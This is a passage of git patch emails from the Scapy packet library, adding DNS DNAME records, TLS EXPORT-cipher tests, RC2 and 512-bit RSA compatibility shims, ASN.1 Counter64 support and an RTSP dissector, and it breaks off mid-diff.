self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) @@ -197,19 +220,25 @@ def recv_raw(self, x=MTU): data, address = self.ins.recvfrom(x) except io.BlockingIOError: return None, None, None # type: ignore - from scapy.layers.inet import IP - from scapy.layers.inet6 import IPv6 if self.ipv6: + from scapy.layers.inet6 import IPv6 # AF_INET6 does not return the IPv6 header. Let's build it # (host, port, flowinfo, scopeid) host, _, flowinfo, _ = address - header = raw(IPv6(src=host, - dst=self.host_ip6, - fl=flowinfo, - nh=self.proto, # fixed for AF_INET6 - plen=len(data))) + header = raw( + IPv6( + src=host, + dst="::", + fl=flowinfo, + # when IPPROTO_IP (0) is selected, we have no idea what's nh, + # so set an invalid value. + nh=self.proto or 0xFF, + plen=len(data) + ) + ) return IPv6, header + data, time.time() else: + from scapy.layers.inet import IP return IP, data, time.time() def close(self): @@ -229,7 +258,10 @@ class L3WinSocket6(L3WinSocket): def __init__(self, **kwargs): # type: (**Any) -> None - super(L3WinSocket6, self).__init__(ipv6=True, **kwargs) + super(L3WinSocket6, self).__init__( + ipv6=True, + **kwargs, + ) def open_icmp_firewall(host): diff --git a/scapy/config.py b/scapy/config.py index 3bcdde997a8..5e25e89da20 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -783,7 +783,7 @@ def _set_conf_sockets(): from scapy.arch.libpcap import L2pcapListenSocket, L2pcapSocket, \ L3pcapSocket except (OSError, ImportError): - warning("No libpcap provider available ! pcap won't be used") + log_loading.warning("No libpcap provider available ! pcap won't be used") Interceptor.set_from_hook(conf, "use_pcap", False) else: conf.L3socket = L3pcapSocket diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 051247a7979..36e60701e59 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -633,7 +633,7 @@ def _interface_selection(iface, # type: Optional[_GlobInterfaceType] try: inet_pton(socket.AF_INET6, src) ipv6 = True - except OSError: + except (ValueError, OSError): pass if iface is None: try: From 3056f2efa7bfda44f1a4d309f9fa793471ecf5d4 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 17 Feb 2024 01:40:15 +0300 Subject: [PATCH 1206/1632] DNS: support DNAME RRs in DNSRRs (#4249) According to https://www.rfc-editor.org/rfc/rfc6672.html#section-2.1 ``` The DNAME RR has mnemonic DNAME and type code 39 (decimal). Its RDATA is comprised of a single field, , which contains a fully qualified domain name that MUST be sent in uncompressed form ``` Even though the RFC says it MUST NOT be compressed `dns_compress` compresses it intentionally to make it easier to test DNS-related software that should be able to handle compressed and uncompressed DNAMEs regradless of what the RFC says. This patch makes it possible to work with FQDNs instead of the wire format. It was prompted by https://github.com/systemd/systemd/issues/30392 where recursive DNAMEs were initially built using FQDNs (by analogy with CNAMEs) and were rejected because they weren't valid. The patch was also cross-checked with Wireshark: ``` >>> tdecode(Ether()/IP()/UDP()/DNS(qd=[], an=[DNSRR(rrname='local', type='DNAME', rdata='local')])) ... Answers local: type DNAME, class IN, dname local Name: local Type: DNAME (39) Class: IN (0x0001) Time to live: 0 (0 seconds) Data length: 7 Dname: local ``` --- scapy/layers/dns.py | 6 +++--- test/scapy/layers/dns.uts | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 35 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index acc6c88f44c..fff4e94c37f 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -242,7 +242,7 @@ def field_gen(dns_pkt): for field in current.fields_desc: if isinstance(field, DNSStrField) or \ (isinstance(field, MultipleTypeField) and - current.type in [2, 3, 4, 5, 12, 15]): + current.type in [2, 3, 4, 5, 12, 15, 39]): # Get the associated data and store it accordingly # noqa: E501 dat = current.getfieldval(field.name) yield current, field.name, dat @@ -1085,10 +1085,10 @@ class DNSRR(Packet): # AAAA (IP6Field("rdata", "::"), lambda pkt: pkt.type == 28), - # NS, MD, MF, CNAME, PTR + # NS, MD, MF, CNAME, PTR, DNAME (DNSStrField("rdata", "", length_from=lambda pkt: pkt.rdlen), - lambda pkt: pkt.type in [2, 3, 4, 5, 12]), + lambda pkt: pkt.type in [2, 3, 4, 5, 12, 39]), # TEXT (DNSTextField("rdata", [""], length_from=lambda pkt: pkt.rdlen), diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 8d2bc6958f2..ab16b36a402 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -252,6 +252,38 @@ assert DNSRR(raw(rr)).rdata == [] rr = DNSRR(rrname='scapy', type='TXT', rdata=[]) assert raw(rr) == b += DNS record type 39 (DNAME) + +b = b'\x05local\x00\x00\x27\x00\x01\x00\x00\x00\x00\x00\x07\x05local\x00' + +p = DNSRR(b) +assert p.rrname == b'local.' and p.type == 39 and p.rdata == b'local.' + +p = DNSRR(rrname=b'local', type='DNAME', rdata='local') +assert raw(p) == b + +# Even though according to https://datatracker.ietf.org/doc/html/rfc6672#section-2.5 +# The DNAME RDATA target name MUST NOT be sent out in compressed form +# dns_compress compresses it intentionally to make it easier to test +# DNS-related software that should be able to handle compressed and +# uncompressed DNAMEs anyway regardless of what the RFC says. + +# Make sure it isn't compressed by default +p = DNS(qd=[], an=[DNSRR(rrname='local', type='DNAME', rdata='local')]) +assert raw(p).endswith(b'\x07\x05local\x00') + +# Make sure it can parse uncompressed DNAMEs +rr = DNS(raw(p)).an[0] +assert rr.rrname == b'local.' and rr.type == 39 and rr.rdata == b'local.' + +# Make sure dns_compress compresses DNAME RDATA +cp = dns_compress(p) +assert raw(cp).endswith(b'\x02\xc0\x0c') + +# Make sure it can parse compressed DNAMEs +rr = DNS(raw(cp)).an[0] +assert rr.rrname == b'local.' and rr.type == 39 and rr.rdata == b'local.' + = DNS record type 64, 65 (SVCB, HTTPS) b = b'\x00\x00\x00\x04\x00\x01\x00\x06' From 16e13720fcb29b6452bd9422973375feb2d313ee Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 17 Feb 2024 18:36:15 +0100 Subject: [PATCH 1207/1632] Add TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 test (#4286) --- scapy/layers/tls/automaton.py | 5 +++++ test/scapy/layers/tls/example_client.py | 11 ++++------- test/scapy/layers/tls/example_server.py | 10 ++++------ test/scapy/layers/tls/tlsclientserver.uts | 18 +++++++++++++----- 4 files changed, 26 insertions(+), 18 deletions(-) diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index d230863cbc0..acd46dd604a 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -64,6 +64,11 @@ class _TLSAutomaton(Automaton): which has not yet been interpreted as a TLS record is kept in 'remain_in'. """ + def __init__(self, *args, **kwargs): + kwargs["ll"] = lambda *args, **kwargs: None + kwargs["recvsock"] = lambda *args, **kwargs: None + super(_TLSAutomaton, self).__init__(*args, **kwargs) + def parse_args(self, mycert=None, mykey=None, **kargs): self.verbose = kargs.pop("verbose", True) diff --git a/test/scapy/layers/tls/example_client.py b/test/scapy/layers/tls/example_client.py index 374c588138b..bbe50a27222 100644 --- a/test/scapy/layers/tls/example_client.py +++ b/test/scapy/layers/tls/example_client.py @@ -12,17 +12,14 @@ import os import socket import sys - -basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) -sys.path=[basedir]+sys.path +from argparse import ArgumentParser from scapy.config import conf from scapy.utils import inet_aton from scapy.layers.tls.automaton_cli import TLSClientAutomaton from scapy.layers.tls.basefields import _tls_version_options from scapy.layers.tls.handshake import TLSClientHello, TLS13ClientHello - -from argparse import ArgumentParser +from scapy.tools.UTscapy import scapy_path psk = None parser = ArgumentParser(description='Simple TLS Client') @@ -86,8 +83,8 @@ server_name=server_name, client_hello=ch, version=args.version, - mycert=basedir+"/test/tls/pki/cli_cert.pem", - mykey=basedir+"/test/tls/pki/cli_key.pem", + mycert=scapy_path("/test/scapy/layers/tls/pki/cli_cert.pem"), + mykey=scapy_path("/test/scapy/layers/tls/pki/cli_key.pem"), psk=args.psk, psk_mode=psk_mode, resumption_master_secret=args.res_master, diff --git a/test/scapy/layers/tls/example_server.py b/test/scapy/layers/tls/example_server.py index f51d3dc7c77..9c4b40fc6f0 100644 --- a/test/scapy/layers/tls/example_server.py +++ b/test/scapy/layers/tls/example_server.py @@ -14,13 +14,11 @@ import os import sys - -basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) -sys.path=[basedir]+sys.path +from argparse import ArgumentParser from scapy.config import conf from scapy.layers.tls.automaton_srv import TLSServerAutomaton -from argparse import ArgumentParser +from scapy.tools.UTscapy import scapy_path parser = ArgumentParser(description='Simple TLS Server') parser.add_argument("--psk", @@ -48,8 +46,8 @@ else: psk_mode = "psk_dhe_ke" -t = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem', - mykey=basedir+'/test/tls/pki/srv_key.pem', +t = TLSServerAutomaton(mycert=scapy_path('/test/scapy/layers/tls/pki/srv_cert.pem'), + mykey=scapy_path('/test/scapy/layers/tls/pki/srv_key.pem'), preferred_ciphersuite=pcs, client_auth=args.client_auth, curve=args.curve, diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index 87b8a593db6..9a4580d9acc 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -1,17 +1,15 @@ % TLS session establishment tests -~ crypto needs_root +~ crypto # More information at http://www.secdev.org/projects/UTscapy/ ############ ############ -+ TLS server automaton tests -~ server -= Load server util functions -~ client ++ Common util functions += Load server util functions import sys, os, re, time, subprocess from queue import Queue @@ -161,6 +159,8 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No print(ret) assert ret[0] ++ TLS server automaton tests +~ server needs_root = Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA ~ open_ssl_client @@ -283,6 +283,10 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, test_tls_client("0700c0", "0002") += Testing TLS server and client with SSLv2 and SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 + +test_tls_client("040080", "0002") + = Testing TLS client with SSLv3 and TLS_RSA_EXPORT_WITH_RC4_40_MD5 test_tls_client("0003", "0300") @@ -291,6 +295,10 @@ test_tls_client("0003", "0300") test_tls_client("0088", "0301") += Testing TLS client with TLS 1.0 and TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 + +test_tls_client("0006", "0301") + = Testing TLS client with TLS 1.1 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA test_tls_client("c013", "0302") From 9a91d0e9efabcca2ee45e82df38b222456b74d07 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 18 Feb 2024 14:57:17 +0100 Subject: [PATCH 1208/1632] Faster TLS client/server tests (#4288) --- scapy/layers/tls/automaton_srv.py | 1 + test/configs/cryptography.utsc | 3 +- test/run_tests | 3 +- test/scapy/layers/tls/tlsclientserver.uts | 57 ++++++++++++++++------- 4 files changed, 44 insertions(+), 20 deletions(-) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 2e8254aebfa..63f42384008 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -211,6 +211,7 @@ def BIND(self): @ATMT.state() def SOCKET_CLOSED(self): + self.socket.close() raise self.WAITING_CLIENT() @ATMT.state() diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index f8635694076..46f5a5eba50 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -13,6 +13,7 @@ "test/tls*.uts": "load_layer(\"tls\")" }, "kw_ko": [ - "mock" + "mock", + "needs_root" ] } diff --git a/test/run_tests b/test/run_tests index bc6b58490ac..d152bdb1cb5 100755 --- a/test/run_tests +++ b/test/run_tests @@ -22,6 +22,7 @@ then case $arg in -3) PYTHON=python3;; + -W) PYTHONWARNINGS="-W error";; *) ARGS="$ARGS $arg";; esac done @@ -60,4 +61,4 @@ then bash ${DIR}/.config/ci/test.sh $PYVER non_root exit $? fi -PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py $ARGS +PYTHONPATH=$DIR exec "$PYTHON" $PYTHONWARNINGS ${DIR}/scapy/tools/UTscapy.py $ARGS diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index 9a4580d9acc..ded10a510d6 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -84,7 +84,7 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= debug=5, **kwargs) # Sync threads - q.put(True) + q.put(t) # Run server automaton t.run() # Return correct answer @@ -92,6 +92,27 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= # Return data q.put(res) + +def wait_tls_test_server_online(): + t = time.time() + while True: + if time.time() - t > 1: + raise RuntimeError("Server socket failed to start in time") + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(1) + s.connect(("127.0.0.1", 4433)) + s.shutdown(socket.SHUT_RDWR) + s.close() + return + except IOError: + try: + s.close() + except: + pass + continue + + def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False, psk=None, sess_out=None): # Run client @@ -144,18 +165,19 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No name="test_tls_server %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads - q_.get() - time.sleep(1) + print("Synchronising...") + atmtsrv = q_.get(timeout=5) + if not atmtsrv: + raise RuntimeError("Server hanged on startup") + wait_tls_test_server_online() + print("Thread synchronised") # Run openssl client run_openssl_client(msg, suite=suite, version=version, tls13=tls13, client_auth=client_auth, psk=psk) # Wait for server - th_.join(5) - if th_.is_alive(): - raise RuntimeError("Test timed out") - # Analyse values - if q_.empty(): - raise RuntimeError("Missing return values") ret = q_.get(timeout=5) + if not ret: + raise RuntimeError("Test timed out") + atmtsrv.stop() print(ret) assert ret[0] @@ -255,8 +277,10 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, th_.start() # Synchronise threads print("Synchronising...") - assert q_.get(timeout=5) is True - time.sleep(1) + atmtsrv = q_.get(timeout=5) + if not atmtsrv: + raise RuntimeError("Server hanged on startup") + wait_tls_test_server_online() print("Thread synchronised") # Run client if sess_in_out: @@ -269,13 +293,10 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, run_tls_test_client(msg, suite, version, client_auth, key_update) # Wait for server print("Client running, waiting...") - th_.join(5) - if th_.is_alive(): - raise RuntimeError("Test timed out") - # Return values - if q_.empty(): - raise RuntimeError("Missing return value") ret = q_.get(timeout=5) + if not ret: + raise RuntimeError("Test timed out") + atmtsrv.stop() print(ret) assert ret[0] @@ -361,7 +382,7 @@ except: # Automaton as Socket tests + TLSAutomatonClient socket tests -~ netaccess +~ netaccess needs_root = Connect to google.com From ca56748f2fcdc89b4b8f99ef9e7dfb7208a860b3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 18 Feb 2024 14:48:58 +0100 Subject: [PATCH 1209/1632] Fix StreamSocket on windows --- scapy/automaton.py | 3 +++ scapy/supersocket.py | 7 +++++++ 2 files changed, 10 insertions(+) diff --git a/scapy/automaton.py b/scapy/automaton.py index ba7bafc71a2..842dc3654e2 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -99,6 +99,9 @@ def select_objects(inputs, remain): events.append(i) if natives: results = results.union(set(select.select(natives, [], [], remain)[0])) + if results: + # We have native results, poll. + remain = 0 if events: # 0xFFFFFFFF = INFINITE remainms = int(remain * 1000 if remain is not None else 0xFFFFFFFF) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index a62742e2c2b..485d201cb58 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -412,6 +412,13 @@ def recv_raw(self, x=MTU): # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] return self.basecls, self.ins.recv(x), None + if WINDOWS: + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + from scapy.automaton import select_objects + return select_objects(sockets, remain) + class StreamSocket(SimpleSocket): """ From 9ee84a19d1b84ce543bc3d1b6789886c32f6dea2 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 18 Feb 2024 16:01:40 +0100 Subject: [PATCH 1210/1632] Hack support for terrible RSA key-lengths in cryptography 43.0 (#4290) --- scapy/layers/tls/cert.py | 45 ++++++++++++++++++++++++++++++++++------ 1 file changed, 39 insertions(+), 6 deletions(-) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index ed934e8b17f..24f1a6aa437 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -44,12 +44,27 @@ from scapy.layers.tls.crypto.pkcs1 import pkcs_os2ip, _get_hash, \ _EncryptAndVerifyRSA, _DecryptAndSignRSA from scapy.compat import raw, bytes_encode + if conf.crypto_valid: from cryptography.exceptions import InvalidSignature from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa, ec + # cryptography raised the minimum RSA key length to 1024 in 43.0+ + # https://github.com/pyca/cryptography/pull/10278 + # but we need still 512 for EXPORT40 ciphers (yes EXPORT is terrible) + # https://datatracker.ietf.org/doc/html/rfc2246#autoid-66 + # The following detects the change and hacks around it using the backend + + try: + rsa.generate_private_key(public_exponent=65537, key_size=512) + _RSA_512_SUPPORTED = True + except ValueError: + # cryptography > 43.0 + _RSA_512_SUPPORTED = False + from cryptography.hazmat.primitives.asymmetric.rsa import rust_openssl + # Maximum allowed size in bytes for a certificate file, to avoid # loading huge file when importing a cert @@ -263,9 +278,18 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None): pubExp = pubExp or 65537 if not modulus: real_modulusLen = modulusLen or 2048 - private_key = rsa.generate_private_key(public_exponent=pubExp, - key_size=real_modulusLen, - backend=default_backend()) + if real_modulusLen < 1024 and not _RSA_512_SUPPORTED: + # cryptography > 43.0 compatibility + private_key = rust_openssl.rsa.generate_private_key( + public_exponent=pubExp, + key_size=real_modulusLen, + ) + else: + private_key = rsa.generate_private_key( + public_exponent=pubExp, + key_size=real_modulusLen, + backend=default_backend(), + ) self.pubkey = private_key.public_key() else: real_modulusLen = len(binrepr(modulus)) @@ -470,9 +494,18 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None, # in order to call RSAPrivateNumbers(...) # if one of these is missing, we generate a whole new key real_modulusLen = modulusLen or 2048 - self.key = rsa.generate_private_key(public_exponent=pubExp, - key_size=real_modulusLen, - backend=default_backend()) + if real_modulusLen < 1024 and not _RSA_512_SUPPORTED: + # cryptography > 43.0 compatibility + self.key = rust_openssl.rsa.generate_private_key( + public_exponent=pubExp, + key_size=real_modulusLen, + ) + else: + self.key = rsa.generate_private_key( + public_exponent=pubExp, + key_size=real_modulusLen, + backend=default_backend(), + ) self.pubkey = self.key.public_key() else: real_modulusLen = len(binrepr(modulus)) From dedddd975c0a5b588e121568f61c4ffe942e1d5e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 18 Feb 2024 17:18:29 +0100 Subject: [PATCH 1211/1632] Update codecov-action to v4 (#4291) --- .github/workflows/unittests.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index b120477dfed..b8e56968f39 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -136,7 +136,9 @@ jobs: - name: Run Tox run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov - uses: codecov/codecov-action@v4.0.0-beta.3 + uses: codecov/codecov-action@v4 + with: + token: ${{ secrets.CODECOV_TOKEN }} cryptography: name: pyca/cryptography test From 2267cc53ba2aac415a4c86e6574b7771737a0123 Mon Sep 17 00:00:00 2001 From: Paul Kehrer Date: Sun, 18 Feb 2024 12:03:51 -0800 Subject: [PATCH 1212/1632] Support RC2 in cryptography 43.0+ (#4285) --- scapy/layers/tls/crypto/cipher_block.py | 58 +++++++++++++++---------- 1 file changed, 35 insertions(+), 23 deletions(-) diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index c2462aebd00..ee64fe1bbc0 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -20,8 +20,7 @@ from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes, # noqa: E501 BlockCipherAlgorithm, CipherAlgorithm) - from cryptography.hazmat.backends.openssl.backend import (backend, - GetCipherByName) + from cryptography.hazmat.backends.openssl.backend import backend _tls_block_cipher_algs = {} @@ -191,24 +190,41 @@ class Cipher_SEED_CBC(_BlockCipher): # silently not declared, and the corresponding suites will have 'usable' False. if conf.crypto_valid: - class _ARC2(BlockCipherAlgorithm, CipherAlgorithm): - name = "RC2" - block_size = 64 - key_sizes = frozenset([128]) - - def __init__(self, key): - self.key = algorithms._verify_key_size(self, key) - - @property - def key_size(self): - return len(self.key) * 8 - - _gcbn_format = "{cipher.name}-{mode.name}" - if GetCipherByName(_gcbn_format)(backend, _ARC2, modes.CBC) != \ - backend._ffi.NULL: - + try: + from cryptography.hazmat.decrepit.ciphers.algorithms import RC2 + rc2_available = backend.cipher_supported( + RC2(b"0" * 16), modes.CBC(b"0" * 8) + ) + except ImportError: + # Legacy path for cryptography < 43.0.0 + from cryptography.hazmat.backends.openssl.backend import ( + GetCipherByName + ) + _gcbn_format = "{cipher.name}-{mode.name}" + + class RC2(BlockCipherAlgorithm, CipherAlgorithm): + name = "RC2" + block_size = 64 + key_sizes = frozenset([128]) + + def __init__(self, key): + self.key = algorithms._verify_key_size(self, key) + + @property + def key_size(self): + return len(self.key) * 8 + if GetCipherByName(_gcbn_format)(backend, RC2, modes.CBC) != \ + backend._ffi.NULL: + rc2_available = True + backend.register_cipher_adapter(RC2, + modes.CBC, + GetCipherByName(_gcbn_format)) + else: + rc2_available = False + + if rc2_available: class Cipher_RC2_CBC(_BlockCipher): - pc_cls = _ARC2 + pc_cls = RC2 pc_cls_mode = modes.CBC block_size = 8 key_len = 16 @@ -217,10 +233,6 @@ class Cipher_RC2_CBC_40(Cipher_RC2_CBC): expanded_key_len = 16 key_len = 5 - backend.register_cipher_adapter(Cipher_RC2_CBC.pc_cls, - Cipher_RC2_CBC.pc_cls_mode, - GetCipherByName(_gcbn_format)) - _sslv2_block_cipher_algs["RC2_128_CBC"] = Cipher_RC2_CBC From 041fbfa7394dd4aa4802a221e0fc819bdf71ba66 Mon Sep 17 00:00:00 2001 From: Mark Howerton <17132543+cessna85@users.noreply.github.com> Date: Sun, 18 Feb 2024 15:22:41 -0500 Subject: [PATCH 1213/1632] Added support for Counter64 in asn1 and ber (for snmp v2c) (#4272) * Added support for Counter64 in asn1 and ber (for snmp v2c) * Update regression.uts --- scapy/asn1/asn1.py | 5 +++++ scapy/asn1/ber.py | 4 ++++ test/regression.uts | 2 +- 3 files changed, 10 insertions(+), 1 deletion(-) diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 658cabb710d..fe4711126aa 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -275,6 +275,7 @@ class ASN1_Class_UNIVERSAL(ASN1_Class): BMP_STRING = cast(ASN1Tag, 30) IPADDRESS = cast(ASN1Tag, 0 | 0x40) # application-specific encoding COUNTER32 = cast(ASN1Tag, 1 | 0x40) # application-specific encoding + COUNTER64 = cast(ASN1Tag, 6 | 0x40) # application-specific encoding GAUGE32 = cast(ASN1Tag, 2 | 0x40) # application-specific encoding TIME_TICKS = cast(ASN1Tag, 3 | 0x40) # application-specific encoding @@ -726,6 +727,10 @@ class ASN1_COUNTER32(ASN1_INTEGER): tag = ASN1_Class_UNIVERSAL.COUNTER32 +class ASN1_COUNTER64(ASN1_INTEGER): + tag = ASN1_Class_UNIVERSAL.COUNTER64 + + class ASN1_GAUGE32(ASN1_INTEGER): tag = ASN1_Class_UNIVERSAL.GAUGE32 diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 413ce1c96e5..cfea919585e 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -696,6 +696,10 @@ class BERcodec_COUNTER32(BERcodec_INTEGER): tag = ASN1_Class_UNIVERSAL.COUNTER32 +class BERcodec_COUNTER64(BERcodec_INTEGER): + tag = ASN1_Class_UNIVERSAL.COUNTER64 + + class BERcodec_GAUGE32(BERcodec_INTEGER): tag = ASN1_Class_UNIVERSAL.GAUGE32 diff --git a/test/regression.uts b/test/regression.uts index cf7899f095c..277ce90cdae 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1528,7 +1528,7 @@ o assert o in [ b'\x1e\x023V', # PyPy 2.7 b'A\x02\x07q', # Python 2.7 - b'B\x02\xfe\x92', # python 3.7-3.9 + b'F\x02\xfe\x92', # python 3.7-3.9 ] = ASN1 - ASN1_BIT_STRING From 380e91edc8317296508af9a2af7108099082f82b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 19 Feb 2024 10:54:55 +0100 Subject: [PATCH 1214/1632] Add RTSP and minor fixes (#4279) --- scapy/contrib/rtsp.py | 166 +++++++++++++++++++++++++++++++ scapy/layers/http.py | 57 ++++++----- scapy/layers/msrpce/msdcom.py | 19 ++-- scapy/layers/msrpce/rpcclient.py | 4 +- test/contrib/rtsp.uts | 32 ++++++ 5 files changed, 245 insertions(+), 33 deletions(-) create mode 100644 scapy/contrib/rtsp.py create mode 100644 test/contrib/rtsp.uts diff --git a/scapy/contrib/rtsp.py b/scapy/contrib/rtsp.py new file mode 100644 index 00000000000..c2f3e8c265c --- /dev/null +++ b/scapy/contrib/rtsp.py @@ -0,0 +1,166 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Real Time Streaming Protocol (RTSP) +RFC 2326 +""" + +# scapy.contrib.description = Real Time Streaming Protocol (RTSP) +# scapy.contrib.status = loads + +import re + +from scapy.packet import ( + bind_bottom_up, + bind_layers, +) +from scapy.layers.http import ( + HTTP, + _HTTPContent, + _HTTPHeaderField, + _generate_headers, + _dissect_headers, +) +from scapy.layers.inet import TCP + + +RTSP_REQ_HEADERS = [ + "Accept", + "Accept-Encoding", + "Accept-Language", + "Authorization", + "From", + "If-Modified-Since", + "Range", + "Referer", + "User-Agent", +] +RTSP_RESP_HEADERS = [ + "Location", + "Proxy-Authenticate", + "Public", + "Retry-After", + "Server", + "Vary", + "WWW-Authenticate", +] + + +class RTSPRequest(_HTTPContent): + name = "RTSP Request" + fields_desc = ( + [ + # First line + _HTTPHeaderField("Method", "DESCRIBE"), + _HTTPHeaderField("Request_Uri", "*"), + _HTTPHeaderField("Version", "RTSP/1.0"), + # Headers + ] + + ( + _generate_headers( + RTSP_REQ_HEADERS, + ) + ) + + [ + _HTTPHeaderField("Unknown-Headers", None), + ] + ) + + def do_dissect(self, s): + first_line, body = _dissect_headers(self, s) + try: + method, uri, version = re.split(rb"\s+", first_line, 2) + self.setfieldval("Method", method) + self.setfieldval("Request_Uri", uri) + self.setfieldval("Version", version) + except ValueError: + pass + if body: + self.raw_packet_cache = s[: -len(body)] + else: + self.raw_packet_cache = s + return body + + def mysummary(self): + return self.sprintf( + "%RTSPRequest.Method% %RTSPRequest.Request_Uri% " "%RTSPRequest.Version%" + ) + + +class RTSPResponse(_HTTPContent): + name = "RTSP Response" + fields_desc = ( + [ + # First line + _HTTPHeaderField("Version", "RTSP/1.1"), + _HTTPHeaderField("Status_Code", "200"), + _HTTPHeaderField("Reason_Phrase", "OK"), + # Headers + ] + + ( + _generate_headers( + RTSP_RESP_HEADERS, + ) + ) + + [ + _HTTPHeaderField("Unknown-Headers", None), + ] + ) + + def answers(self, other): + return RTSPRequest in other + + def do_dissect(self, s): + first_line, body = _dissect_headers(self, s) + try: + Version, Status, Reason = re.split(rb"\s+", first_line, 2) + self.setfieldval("Version", Version) + self.setfieldval("Status_Code", Status) + self.setfieldval("Reason_Phrase", Reason) + except ValueError: + pass + if body: + self.raw_packet_cache = s[: -len(body)] + else: + self.raw_packet_cache = s + return body + + def mysummary(self): + return self.sprintf( + "%RTSPResponse.Version% %RTSPResponse.Status_Code% " + "%RTSPResponse.Reason_Phrase%" + ) + + +class RTSP(HTTP): + name = "RTSP" + clsreq = RTSPRequest + clsresp = RTSPResponse + hdr = b"RTSP" + reqmethods = b"|".join( + [ + b"DESCRIBE", + b"ANNOUNCE", + b"GET_PARAMETER", + b"OPTIONS", + b"PAUSE", + b"PLAY", + b"RECORD", + b"REDIRECT", + b"SETUP", + b"SET_PARAMETER", + b"TEARDOWN", + ] + ) + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + return cls + + +bind_bottom_up(TCP, RTSP, sport=554) +bind_bottom_up(TCP, RTSP, dport=554) +bind_layers(TCP, RTSP, dport=554, sport=554) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index f2b3bd5e7a6..51fc0df8407 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -383,7 +383,7 @@ def 